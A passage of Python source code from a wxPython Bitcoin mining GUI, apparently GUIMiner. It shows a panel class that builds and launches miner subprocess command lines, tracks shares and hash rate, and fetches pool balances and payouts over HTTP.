self.withdraw] + self.labels + self.txts + self.affinity_chks
self.hidden_widgets = [self.extra_info,
self.txt_external,
self.external_lbl]
self.start = wx.Button(self, -1, STR_START_MINING)
self.device_listbox.SetSelection(0)
self.server.SetStringSelection(self.defaults.get('default_server'))
self.set_data(data)
for txt in self.txts:
txt.Bind(wx.EVT_KEY_UP, self.check_if_modified)
self.device_listbox.Bind(wx.EVT_COMBOBOX, self.check_if_modified)
self.start.Bind(wx.EVT_BUTTON, self.toggle_mining)
self.server.Bind(wx.EVT_COMBOBOX, self.on_select_server)
self.balance_refresh_timer.Bind(wx.EVT_TIMER, self.on_balance_cooldown_tick)
self.balance_refresh.Bind(wx.EVT_BUTTON, self.on_balance_refresh)
self.withdraw.Bind(wx.EVT_BUTTON, self.on_withdraw)
for chk in self.affinity_chks:
chk.Bind(wx.EVT_CHECKBOX, self.on_affinity_check)
self.Bind(EVT_UPDATE_HASHRATE, lambda event: self.update_khash(event.rate))
self.Bind(EVT_UPDATE_ACCEPTED, lambda event: self.update_shares(event.accepted))
self.Bind(EVT_UPDATE_STATUS, lambda event: self.update_status(event.text))
self.Bind(EVT_UPDATE_SOLOCHECK, lambda event: self.update_solo())
self.update_statusbar()
self.clear_summary_widgets()
@property
def last_update_time(self):
"""Return the local time of the last accepted share."""
if self.accepted_times:
return time.localtime(self.accepted_times[-1])
return None
@property
def server_config(self):
hostname = self.txt_host.GetValue()
return self.get_server_by_field(hostname, 'host')
@property
def is_solo(self):
"""Return True if this miner is configured for solo mining."""
return self.server.GetStringSelection() == "solo"
@property
def is_modified(self):
"""Return True if this miner has unsaved changes pending."""
return self.last_data != self.get_data()
@property
def external_path(self):
"""Return the path to an external miner, or "" if none is present."""
return self.txt_external.GetValue()
@property
def is_external_miner(self):
"""Return True if this miner has an external path configured."""
return self.txt_external.GetValue() != ""
@property
def host_with_http_prefix(self):
"""Return the host address, with http:// prepended if needed."""
host = self.txt_host.GetValue()
if not host.startswith("http://"):
host = "http://" + host
return host
@property
def host_without_http_prefix(self):
"""Return the host address, with http:// stripped off if needed."""
host = self.txt_host.GetValue()
if host.startswith("http://"):
return host[len('http://'):]
return host
@property
def device_index(self):
"""Return the index of the currently selected OpenCL device."""
s = self.device_listbox.GetStringSelection()
match = re.search(r'\[(\d+)-(\d+)\]', s)
try: return int(match.group(2))
except: return 0
@property
def platform_index(self):
"""Return the index of the currently selected OpenCL platform."""
s = self.device_listbox.GetStringSelection()
match = re.search(r'\[(\d+)-(\d+)\]', s)
try: return int(match.group(1))
except: return 0
@property
def is_device_visible(self):
"""Return True if we are using a backend with device selection."""
NO_DEVICE_SELECTION = ['rpcminer', 'bitcoin-miner']
return not any(d in self.external_path for d in NO_DEVICE_SELECTION)
def on_affinity_check(self, event):
"""Set the affinity mask to the selected value."""
self.affinity_mask = 0
for i in range(self.num_processors):
is_checked = self.affinity_chks[i].GetValue()
self.affinity_mask += (is_checked << i)
if self.is_mining:
try:
set_process_affinity(self.miner.pid, self.affinity_mask)
except:
pass # TODO: test on Linux
def pause(self):
"""Pause the miner if we are mining, otherwise do nothing."""
if self.is_mining:
self.stop_mining()
self.is_paused = True
def resume(self):
"""Resume the miner if we are paused, otherwise do nothing."""
if self.is_paused:
self.start_mining()
self.is_paused = False
def get_data(self):
"""Return a dict of our profile data."""
return dict(name=self.name,
hostname=self.txt_host.GetValue(),
port=self.txt_port.GetValue(),
username=self.txt_username.GetValue(),
password=self.txt_pass.GetValue(),
device=self.device_listbox.GetSelection(),
flags=self.txt_flags.GetValue(),
autostart=self.autostart,
affinity_mask=self.affinity_mask,
balance_auth_token=self.balance_auth_token,
external_path=self.external_path)
def set_data(self, data):
"""Set our profile data to the information in data. See get_data()."""
self.last_data = data
default_server_config = self.get_server_by_field(
self.defaults['default_server'], 'name')
self.name = (data.get('name') or _('Default'))
# Backwards compatibility: hostname key used to be called server.
# We only save out hostname now but accept server from old INI files.
hostname = (data.get('hostname') or
data.get('server') or
default_server_config['host'])
self.txt_host.SetValue(hostname)
self.server.SetStringSelection(self.server_config.get('name', "Other"))
self.txt_username.SetValue(
data.get('username') or
self.defaults.get('default_username', ''))
self.txt_pass.SetValue(
data.get('password') or
self.defaults.get('default_password', ''))
self.txt_port.SetValue(str(
data.get('port') or
self.server_config.get('port', 8332)))
self.txt_flags.SetValue(data.get('flags', ''))
self.autostart = data.get('autostart', False)
self.affinity_mask = data.get('affinity_mask', 1)
for i in range(self.num_processors):
self.affinity_chks[i].SetValue((self.affinity_mask >> i) & 1)
self.txt_external.SetValue(data.get('external_path', ''))
# Handle case where they removed devices since last run.
device_index = data.get('device', None)
if device_index is not None and device_index < self.device_listbox.GetCount():
self.device_listbox.SetSelection(device_index)
self.change_server(self.server_config)
self.balance_auth_token = data.get('balance_auth_token', '')
def clear_summary_widgets(self):
"""Release all our summary widgets."""
self.summary_name = None
self.summary_status = None
self.summary_shares_accepted = None
self.summary_shares_stale = None
self.summary_start = None
self.summary_autostart = None
def get_start_stop_state(self):
"""Return appropriate text for the start/stop button."""
return _("Stop") if self.is_mining else _("Start")
def get_start_label(self):
return STR_STOP_MINING if self.is_mining else STR_START_MINING
def update_summary(self):
"""Update our summary fields if possible."""
if not self.summary_panel:
return
self.summary_name.SetLabel(self.name)
if self.is_paused:
text = STR_PAUSED
elif not self.is_mining:
text = STR_STOPPED
elif self.is_possible_error:
text = _("Connection problems")
else:
text = format_khash(self.last_rate)
self.summary_status.SetLabel(text)
self.summary_shares_accepted.SetLabel("%d (%d)" %
(self.accepted_shares, len(self.accepted_times)))
if self.is_solo:
self.summary_shares_invalid.SetLabel("-")
else:
self.summary_shares_invalid.SetLabel("%d (%d)" %
(self.invalid_shares, len(self.invalid_times)))
self.summary_start.SetLabel(self.get_start_stop_state())
self.summary_autostart.SetValue(self.autostart)
self.summary_panel.grid.Layout()
def get_summary_widgets(self, summary_panel):
"""Return a list of summary widgets suitable for sizer.AddMany."""
self.summary_panel = summary_panel
self.summary_name = wx.StaticText(summary_panel, -1, self.name)
self.summary_name.Bind(wx.EVT_LEFT_UP, self.show_this_panel)
self.summary_status = wx.StaticText(summary_panel, -1, STR_STOPPED)
self.summary_shares_accepted = wx.StaticText(summary_panel, -1, "0")
self.summary_shares_invalid = wx.StaticText(summary_panel, -1, "0")
self.summary_start = wx.Button(summary_panel, -1, self.get_start_stop_state(), style=wx.BU_EXACTFIT)
self.summary_start.Bind(wx.EVT_BUTTON, self.toggle_mining)
self.summary_autostart = wx.CheckBox(summary_panel, -1)
self.summary_autostart.Bind(wx.EVT_CHECKBOX, self.toggle_autostart)
self.summary_autostart.SetValue(self.autostart)
return [
(self.summary_name, 0, wx.ALIGN_CENTER_HORIZONTAL),
(self.summary_status, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_shares_accepted, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_shares_invalid, 0, wx.ALIGN_CENTER_HORIZONTAL, 0),
(self.summary_start, 0, wx.ALIGN_CENTER, 0),
(self.summary_autostart, 0, wx.ALIGN_CENTER, 0)
]
def show_this_panel(self, event):
"""Set focus to this panel."""
self.parent.SetSelection(self.parent.GetPageIndex(self))
def toggle_autostart(self, event):
self.autostart = event.IsChecked()
def toggle_mining(self, event):
"""Stop or start the miner."""
if self.is_mining:
self.stop_mining()
else:
self.start_mining()
self.update_summary()
#############################
# Begin backend specific code
def configure_subprocess_poclbm(self):
"""Set up the command line for poclbm."""
folder = get_module_path()
if USE_MOCK:
executable = "python mockBitcoinMiner.py"
else:
if hasattr(sys, 'frozen'):
executable = "poclbm.exe"
else:
executable = "python poclbm.py"
cmd = "%s %s:%s@%s:%s --device=%d --platform=%d --verbose -r1 %s" % (
executable,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.txt_host.GetValue(),
self.txt_port.GetValue(),
self.device_index,
self.platform_index,
self.txt_flags.GetValue()
)
return cmd, folder
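    # A typical command line produced above (illustrative values only):
    #
    #     poclbm.exe user:pass@pool.example.com:8332 --device=0 \
    #         --platform=0 --verbose -r1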
def configure_subprocess_rpcminer(self):
"""Set up the command line for rpcminer.
The hostname must start with http:// for these miners.
"""
cmd = "%s -user=%s -password=%s -url=%s:%s %s" % (
self.external_path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_with_http_prefix,
self.txt_port.GetValue(),
self.txt_flags.GetValue()
)
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_ufasoft(self):
"""Set up the command line for ufasoft's SSE2 miner.
The hostname must start with http:// for these miners.
"""
cmd = "%s -u %s -p %s -o %s:%s %s" % (
self.external_path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_with_http_prefix,
self.txt_port.GetValue(),
self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_phoenix(self):
"""Set up the command line for phoenix miner."""
path = self.external_path
if path.endswith('.py'):
path = "python " + path
cmd = "%s -u http://%s:%s@%s:%s PLATFORM=%d DEVICE=%d %s" % (
path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_without_http_prefix,
self.txt_port.GetValue(),
self.platform_index,
self.device_index,
self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
def configure_subprocess_cgminer(self):
"""Set up the command line for cgminer."""
path = self.external_path
if path.endswith('.py'):
path = "python " + path
# Command line arguments for cgminer here:
# -u <username>
# -p <password>
# -o <http://server.ip:port>
# -d <device appear in pyopencl>
# -l <log message period in second>
# -T <disable curses interface and output to console (stdout)>
cmd = "%s -u %s -p %s -o http://%s:%s -d %s -l 1 -T %s" % (
path,
self.txt_username.GetValue(),
self.txt_pass.GetValue(),
self.host_without_http_prefix,
self.txt_port.GetValue(),
self.device_index,
self.txt_flags.GetValue())
return cmd, os.path.dirname(self.external_path)
# End backend specific code
###########################
def start_mining(self):
"""Launch a miner subprocess and attach a MinerListenerThread."""
self.is_paused = False
# Avoid showing a console window when frozen
try: import win32process
except ImportError: flags = 0
else: flags = win32process.CREATE_NO_WINDOW
# Determine what command line arguments to use
listener_cls = MinerListenerThread
if not self.is_external_miner:
conf_func = self.configure_subprocess_poclbm
elif "rpcminer" in self.external_path:
conf_func = self.configure_subprocess_rpcminer
elif "bitcoin-miner" in self.external_path:
conf_func = self.configure_subprocess_ufasoft
elif "phoenix" in self.external_path:
conf_func = self.configure_subprocess_phoenix
listener_cls = PhoenixListenerThread
elif "cgminer" in self.external_path:
conf_func = self.configure_subprocess_cgminer
listener_cls = CgListenerThread
else:
raise ValueError # TODO: handle unrecognized miner
cmd, cwd = conf_func()
# for ufasoft:
# redirect stderr to stdout
# use universal_newlines to catch the \r output on Mhash/s lines
try:
logger.debug(_('Running command: ') + cmd)
# for cgminer:
# We need only the STDOUT for meaningful messages.
if conf_func == self.configure_subprocess_cgminer:
self.miner = subprocess.Popen(cmd, cwd=cwd,
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True,
creationflags=flags,
shell=(sys.platform != 'win32'))
else:
self.miner = subprocess.Popen(cmd, cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
creationflags=flags,
shell=(sys.platform != 'win32'))
except OSError:
            raise  # TODO: the folder or exe might not exist
self.miner_listener = listener_cls(self, self.miner)
self.miner_listener.daemon = True
self.miner_listener.start()
self.is_mining = True
self.set_status(STR_STARTING, 1)
self.start.SetLabel(self.get_start_label())
try:
set_process_affinity(self.miner.pid, self.affinity_mask)
except:
pass # TODO: test on Linux
def on_close(self):
"""Prepare to close gracefully."""
self.stop_mining()
self.balance_refresh_timer.Stop()
def stop_mining(self):
"""Terminate the poclbm process if able and its associated listener."""
if self.miner is not None:
if self.miner.returncode is None:
# It didn't return yet so it's still running.
try:
self.miner.terminate()
except OSError:
pass # TODO: Guess it wasn't still running?
self.miner = None
if self.miner_listener is not None:
self.miner_listener.shutdown_event.set()
self.miner_listener = None
self.is_mining = False
self.is_paused = False
self.set_status(STR_STOPPED, 1)
self.start.SetLabel(self.get_start_label())
def update_khash(self, rate):
"""Update our rate according to a report from the listener thread.
If we are receiving rate messages then it means poclbm is no longer
reporting errors.
"""
self.last_rate = rate
self.set_status(format_khash(rate), 1)
if self.is_possible_error:
self.update_statusbar()
self.is_possible_error = False
def update_statusbar(self):
"""Show the shares or equivalent on the statusbar."""
if self.is_solo:
text = _("Difficulty 1 hashes: %(nhashes)d %(update_time)s") % \
dict(nhashes=self.accepted_shares,
update_time=self.format_last_update_time())
if self.solo_blocks_found > 0:
block_text = _("Blocks: %d, ") % self.solo_blocks_found
text = block_text + text
else:
text = _("Shares: %d accepted") % self.accepted_shares
if self.invalid_shares > 0:
text += _(", %d stale/invalid") % self.invalid_shares
text += " %s" % self.format_last_update_time()
self.set_status(text, 0)
def update_last_time(self, accepted):
"""Set the last update time to now (in local time)."""
now = time.time()
if accepted:
self.accepted_times.append(now)
while now - self.accepted_times[0] > SAMPLE_TIME_SECS:
self.accepted_times.popleft()
else:
self.invalid_times.append(now)
while now - self.invalid_times[0] > SAMPLE_TIME_SECS:
self.invalid_times.popleft()
def format_last_update_time(self):
"""Format last update time for display."""
time_fmt = '%I:%M:%S%p'
if self.last_update_time is None:
return ""
return _("- last at %s") % time.strftime(time_fmt, self.last_update_time)
def update_shares(self, accepted):
"""Update our shares with a report from the listener thread."""
if self.is_solo and accepted:
self.solo_blocks_found += 1
elif accepted:
self.accepted_shares += 1
else:
self.invalid_shares += 1
self.update_last_time(accepted)
self.update_statusbar()
def update_status(self, msg):
"""Update our status with a report from the listener thread.
If we receive a message from poclbm we don't know how to interpret,
it's probably some kind of error state - in this case the best
thing to do is just show it to the user on the status bar.
"""
self.set_status(msg)
self.is_possible_error = True
def set_status(self, msg, index=0):
"""Set the current statusbar text, but only if we have focus."""
if self.parent.GetSelection() == self.parent.GetPageIndex(self):
self.statusbar.SetStatusText(msg, index)
def on_focus(self):
"""When we receive focus, update our status.
This ensures that when switching tabs, the statusbar always
shows the current tab's status.
"""
self.update_statusbar()
if self.is_mining:
self.update_khash(self.last_rate)
else:
self.set_status(STR_STOPPED, 1)
def get_taskbar_text(self):
"""Return text for the hover state of the taskbar."""
rate = format_khash(self.last_rate) if self.is_mining else STR_STOPPED
return "%s: %s" % (self.name, rate)
def update_solo(self):
"""Update our easy hashes with a report from the listener thread."""
self.accepted_shares += 1
self.update_last_time(True)
self.update_statusbar()
def on_select_server(self, event):
"""Update our info in response to a new server choice."""
new_server_name = self.server.GetValue()
new_server = self.get_server_by_field(new_server_name, 'name')
self.change_server(new_server)
def get_server_by_field(self, target_val, field):
"""Return the first server dict with the specified val, or {}."""
for s in self.servers:
if s.get(field) == target_val:
return s
return {}
def set_widgets_visible(self, widgets, show=False):
"""Show or hide each widget in widgets according to the show flag."""
for w in widgets:
if show:
w.Show()
else:
w.Hide()
def set_tooltips(self):
add_tooltip(self.server, _("Server to connect to. Different servers have different fees and features.\nCheck their websites for full information."))
add_tooltip(self.website, _("Website of the currently selected server. Click to visit."))
add_tooltip(self.device_listbox, _("Available OpenCL devices on your system."))
add_tooltip(self.txt_host, _("Host address, without http:// prefix."))
add_tooltip(self.txt_port, _("Server port. This is usually 8332."))
add_tooltip(self.txt_username, _("The miner's username.\nMay be different than your account username.\nExample: Kiv.GPU"))
add_tooltip(self.txt_pass, _("The miner's password.\nMay be different than your account password."))
add_tooltip(self.txt_flags, _("""Extra flags to pass to the miner.
For poclbm use -v -w 128 for dedicated mining, or append -f 60 for desktop usage.
For cgminer use -I 8 or -I 9 for dedicated mining, or no extra flags for desktop usage."""))
for chk in self.affinity_chks:
add_tooltip(chk, _("CPU cores used for mining.\nUnchecking some cores can reduce high CPU usage in some systems."))
def reset_statistics(self):
"""Reset our share statistics to zero."""
self.solo_blocks_found = 0
self.accepted_shares = 0
self.accepted_times.clear()
self.invalid_shares = 0
self.invalid_times.clear()
self.update_statusbar()
def change_server(self, new_server):
"""Change the server to new_server, updating fields as needed."""
self.reset_statistics()
# Set defaults before we do server specific code
self.set_tooltips()
self.set_widgets_visible(self.all_widgets, True)
self.withdraw.Disable()
url = new_server.get('url', 'n/a')
self.website.SetLabel(url)
self.website.SetURL(url)
# Invalidate any previous auth token since it won't be valid for the
# new server.
self.balance_auth_token = ""
if 'host' in new_server:
self.txt_host.SetValue(new_server['host'])
if 'port' in new_server:
self.txt_port.SetValue(str(new_server['port']))
# Call server specific code.
host = new_server.get('host', "").lower()
if host == "api2.bitcoin.cz" or host == "mtred.com": self.layout_slush()
if "eligius.st" in host: self.layout_eligius()
elif host == "bitpenny.dyndns.biz": self.layout_bitpenny()
elif host == "pit.deepbit.net": self.layout_deepbit()
elif host == "btcmine.com": self.layout_btcmine()
elif host == "rr.btcmp.com": self.layout_btcmp()
elif "btcguild.com" in host: self.layout_btcguild()
elif host == "bitcoin-server.de": self.layout_bitcoinserver
elif host == "pit.x8s.de": self.layout_x8s()
else: self.layout_default()
self.Layout()
self.update_tab_name()
def on_balance_cooldown_tick(self, event=None):
"""Each second, decrement the cooldown for refreshing balance."""
self.balance_cooldown_seconds -= 1
self.balance_refresh.SetLabel("%d..." % self.balance_cooldown_seconds)
if self.balance_cooldown_seconds <= 0:
self.balance_refresh_timer.Stop()
self.balance_refresh.Enable()
self.balance_refresh.SetLabel(STR_REFRESH_BALANCE)
def require_auth_token(self):
"""Prompt the user for an auth token if they don't have one already.
Set the result to self.balance_auth_token and return None.
"""
if self.balance_auth_token:
return
url = self.server_config.get('balance_token_url')
dialog = BalanceAuthRequest(self, url)
dialog.txt_token.SetFocus()
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
self.balance_auth_token = dialog.get_value() # TODO: validate token?
def is_auth_token_rejected(self, response):
"""If the server rejected our token, reset auth_token and return True.
Otherwise, return False.
"""
if response.status in [401, 403]: # 401 Unauthorized or 403 Forbidden
# Token rejected by the server - reset their token so they'll be
# prompted again
self.balance_auth_token = ""
return True
return False
def request_balance_get(self, balance_auth_token, use_https=False):
"""Request our balance from the server via HTTP GET and auth token.
This method should be run in its own thread.
"""
response, data = http_request(
self.server_config['balance_host'],
"GET",
self.server_config["balance_url"] % balance_auth_token,
use_https=use_https
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
try:
info = json.loads(data)
confirmed = (info.get('confirmed_reward') or
info.get('confirmed') or
info.get('balance') or
info.get('user', {}).get('confirmed_rewards') or
0)
unconfirmed = (info.get('unconfirmed_reward') or
info.get('unconfirmed') or
info.get('user', {}).get('unconfirmed_rewards') or
0)
if self.server_config.get('host') == "pit.deepbit.net":
ipa = info.get('ipa', False)
self.withdraw.Enable(ipa)
if self.server_config.get('host') == "rr.btcmp.com":
ipa = info.get('can_payout', False)
self.withdraw.Enable(ipa)
data = _("%s confirmed") % format_balance(confirmed)
if unconfirmed > 0:
data += _(", %s unconfirmed") % format_balance(unconfirmed)
except: # TODO: what exception here?
data = _("Bad response from server.")
wx.CallAfter(self.balance_amt.SetLabel, data)
def on_withdraw(self, event):
self.withdraw.Disable()
host = self.server_config.get('host')
if host == 'bitpenny.dyndns.biz':
self.withdraw_bitpenny()
elif host == 'pit.deepbit.net':
self.withdraw_deepbit()
elif host == 'rr.btcmp.com':
self.withdraw_btcmp()
def requires_auth_token(self, host):
"""Return True if the specified host requires an auth token for balance update."""
HOSTS_REQUIRING_AUTH_TOKEN = ["api2.bitcoin.cz",
"btcmine.com",
"pit.deepbit.net",
"pit.x8s.de",
"mtred.com",
"rr.btcmp.com",
"bitcoin-server.de"]
if host in HOSTS_REQUIRING_AUTH_TOKEN: return True
if "btcguild" in host: return True
return False
def requires_https(self, host):
"""Return True if the specified host requires HTTPs for balance update."""
HOSTS = ["mtred.com", "api2.bitcoin.cz"]
if host in HOSTS: return True
if "btcguild" in host: return True
return False
def on_balance_refresh(self, event=None):
"""Refresh the miner's balance from the server."""
host = self.server_config.get("host")
if self.requires_auth_token(host):
self.require_auth_token()
if not self.balance_auth_token: # They cancelled the dialog
return
try:
self.balance_auth_token.decode('ascii')
except UnicodeDecodeError:
return # Invalid characters in auth token
self.http_thread = threading.Thread(
target=self.request_balance_get,
args=(self.balance_auth_token,),
kwargs=dict(use_https=self.requires_https(host)))
self.http_thread.start()
elif host == 'bitpenny.dyndns.biz':
self.http_thread = threading.Thread(
target=self.request_payout_bitpenny, args=(False,))
self.http_thread.start()
elif 'eligius.st' in host:
self.http_thread = threading.Thread(
target=self.request_balance_eligius
)
self.http_thread.start()
self.balance_refresh.Disable()
self.balance_cooldown_seconds = 10
self.balance_refresh_timer.Start(1000)
#################################
# Begin server specific HTTP code
def withdraw_btcmp(self):
"""Launch a thread to withdraw from deepbit."""
self.require_auth_token()
if not self.balance_auth_token: # User refused to provide token
return
self.http_thread = threading.Thread(
target=self.request_payout_btcmp,
args=(self.balance_auth_token,))
self.http_thread.start()
def withdraw_deepbit(self):
"""Launch a thread to withdraw from deepbit."""
self.require_auth_token()
if not self.balance_auth_token: # User refused to provide token
return
self.http_thread = threading.Thread(
target=self.request_payout_deepbit,
args=(self.balance_auth_token,))
self.http_thread.start()
def withdraw_bitpenny(self):
self.http_thread = threading.Thread(
target=self.request_payout_bitpenny, args=(True,))
self.http_thread.start() # TODO: look at aliasing of this variable
def request_payout_btcmp(self, balance_auth_token):
"""Request payout from btcmp's server via HTTP POST."""
response, data = http_request(
self.server_config['balance_host'],
"GET",
self.server_config["payout_url"] % balance_auth_token,
use_https=False
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
def request_payout_deepbit(self, balance_auth_token):
"""Request payout from deepbit's server via HTTP POST."""
post_params = dict(id=1,
method="request_payout")
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'] % balance_auth_token,
json.dumps(post_params),
{"Content-type": "application/json; charset=utf-8",
"User-Agent": USER_AGENT}
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
else:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
def request_payout_bitpenny(self, withdraw):
"""Request our balance from BitPenny via HTTP POST.
If withdraw is True, also request a withdrawal.
"""
post_params = dict(a=self.txt_username.GetValue(), w=int(withdraw))
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'],
urllib.urlencode(post_params),
{"Content-type": "application/x-www-form-urlencoded"}
)
if self.is_auth_token_rejected(response):
data = _("Auth token rejected by server.")
elif not data:
data = STR_CONNECTION_ERROR
elif withdraw:
data = _("Withdraw OK")
wx.CallAfter(self.on_balance_received, data)
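    # Illustrative request body produced by urllib.urlencode above: for a
    # (hypothetical) address "1A94..." with withdraw=True, the POST body is
    # "a=1A94...&w=1".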
def request_balance_eligius(self):
"""Request our balance from Eligius
"""
response, data = http_request(
self.server_config['balance_host'],
"POST",
self.server_config['balance_url'] % (self.txt_username.GetValue(),),
)
        if not data:
            data = STR_CONNECTION_ERROR
        else:
            try:
                data = json.loads(data)
                data = data['expected'] / 1e8  # satoshis -> BTC
            except BaseException as e:
                data = str(e)
wx.CallAfter(self.on_balance_received, data)
def on_balance_received(self, balance):
"""Set the balance in the GUI."""
try:
amt = float(balance)
except ValueError: # Response was some kind of error
self.balance_amt.SetLabel(balance)
else:
if amt > 0.1:
self.withdraw.Enable()
amt_str = format_balance(amt)
self.balance_amt.SetLabel(amt_str)
self.Layout()
# End server specific HTTP code
###############################
def set_name(self, name):
"""Set the label on this miner's tab to name."""
self.name = name
if self.summary_name:
self.summary_name.SetLabel(self.name)
self.update_tab_name()
def update_tab_name(self):
"""Update the tab name to reflect modified status."""
name = self.name
if self.is_modified:
name += "*"
page = self.parent.GetPageIndex(self)
if page != -1:
self.parent.SetPageText(page, name)
def check_if_modified(self, event):
"""Update the title of the tab to have an asterisk if we are modified."""
self.update_tab_name()
event.Skip()
def on_saved(self):
"""Update our last data after a save."""
self.last_data = self.get_data()
self.update_tab_name()
def layout_init(self):
"""Create the sizers for this frame and set up the external text.
Return the lowest row that is available.
"""
self.frame_sizer = wx.BoxSizer(wx.VERTICAL)
self.frame_sizer.Add((20, 10), 0, wx.EXPAND, 0)
self.inner_sizer = wx.GridBagSizer(10, 5)
self.button_sizer = wx.BoxSizer(wx.HORIZONTAL)
row = 0
if self.is_external_miner:
self.inner_sizer.Add(self.external_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_external, (row, 1), span=(1, 3), flag=wx.EXPAND)
row += 1
return row
def layout_server_and_website(self, row):
"""Lay out the server and website widgets in the specified row."""
self.inner_sizer.Add(self.server_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.server, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.website_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.website, (row, 3), flag=wx.ALIGN_CENTER_VERTICAL)
def layout_host_and_port(self, row):
"""Lay out the host and port widgets in the specified row."""
self.inner_sizer.Add(self.host_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_host, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.port_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_port, (row, 3), flag=wx.EXPAND)
def layout_user_and_pass(self, row):
"""Lay out the user and pass widgets in the specified row."""
self.inner_sizer.Add(self.user_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row, 1), flag=wx.EXPAND)
self.inner_sizer.Add(self.pass_lbl, (row, 2), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_pass, (row, 3), flag=wx.EXPAND)
def layout_device_and_flags(self, row):
"""Lay out the device and flags widgets in the specified row.
Hide the device dropdown if RPCMiner is present since it doesn't use it.
"""
device_visible = self.is_device_visible
self.set_widgets_visible([self.device_lbl, self.device_listbox], device_visible)
if device_visible:
self.inner_sizer.Add(self.device_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.device_listbox, (row, 1), flag=wx.EXPAND)
        col = 2 if device_visible else 0
self.inner_sizer.Add(self.flags_lbl, (row, col), flag=LBL_STYLE)
span = (1, 1) if device_visible else (1, 4)
self.inner_sizer.Add(self.txt_flags, (row, col + 1), span=span, flag=wx.EXPAND)
def layout_affinity(self, row):
"""Lay out the affinity checkboxes in the specified row."""
self.inner_sizer.Add(self.affinity_lbl, (row, 0))
affinity_sizer = wx.BoxSizer(wx.HORIZONTAL)
for chk in self.affinity_chks:
affinity_sizer.Add(chk)
self.inner_sizer.Add(affinity_sizer, (row, 1))
def layout_balance(self, row):
"""Lay out the balance widgets in the specified row."""
self.inner_sizer.Add(self.balance_lbl, (row, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.balance_amt, (row, 1))
def layout_finish(self):
"""Lay out the buttons and fit the sizer to the window."""
self.frame_sizer.Add(self.inner_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
self.frame_sizer.Add(self.button_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)
self.inner_sizer.AddGrowableCol(1)
self.inner_sizer.AddGrowableCol(3)
for btn in [self.start, self.balance_refresh, self.withdraw]:
self.button_sizer.Add(btn, 0, BTN_STYLE, 5)
self.set_widgets_visible([self.external_lbl, self.txt_external],
self.is_external_miner)
self.SetSizerAndFit(self.frame_sizer)
def layout_default(self):
"""Lay out a default miner with no custom changes."""
self.user_lbl.SetLabel(STR_USERNAME)
self.set_widgets_visible(self.hidden_widgets, False)
self.set_widgets_visible([self.balance_lbl,
self.balance_amt,
self.balance_refresh,
self.withdraw], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
customs = ["other", "solo"]
is_custom = self.server.GetStringSelection().lower() in customs
if is_custom:
self.layout_host_and_port(row=row + 1)
else:
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port], False)
self.layout_user_and_pass(row=row + 1 + int(is_custom))
self.layout_device_and_flags(row=row + 2 + int(is_custom))
self.layout_affinity(row=row + 3 + int(is_custom))
self.layout_finish()
############################
# Begin server specific code
def layout_bitpenny(self):
"""BitPenny doesn't require registration or a password.
The username is just their receiving address.
"""
invisible = [self.txt_pass, self.txt_host, self.txt_port,
self.pass_lbl, self.host_lbl, self.port_lbl]
self.set_widgets_visible(invisible, False)
self.set_widgets_visible([self.extra_info], True)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.inner_sizer.Add(self.user_lbl, (row + 1, 0), flag=LBL_STYLE)
self.inner_sizer.Add(self.txt_username, (row + 1, 1), span=(1, 3), flag=wx.EXPAND)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.inner_sizer.Add(self.extra_info, (row + 5, 0), span=(1, 4), flag=wx.ALIGN_CENTER_HORIZONTAL)
self.layout_finish()
self.extra_info.SetLabel(_("No registration is required - just enter an address and press Start."))
self.txt_pass.SetValue('poclbm-gui')
self.user_lbl.SetLabel(_("Address:"))
add_tooltip(self.txt_username,
_("Your receiving address for Bitcoins.\nE.g.: 1A94cjRpaPBMV9ZNWFihB5rTFEeihBALgc"))
def layout_slush(self):
"""Slush's pool uses a separate username for each miner."""
self.set_widgets_visible([self.host_lbl, self.txt_host,
self.port_lbl, self.txt_port,
self.withdraw, self.extra_info], False)
row = self.layout_init()
self.layout_server_and_website(row=row)
self.layout_user_and_pass(row=row + 1)
self.layout_device_and_flags(row=row + 2)
self.layout_affinity(row=row + 3)
self.layout_balance(row=row + 4)
self.layout_finish()
add_tooltip(self.txt_username,
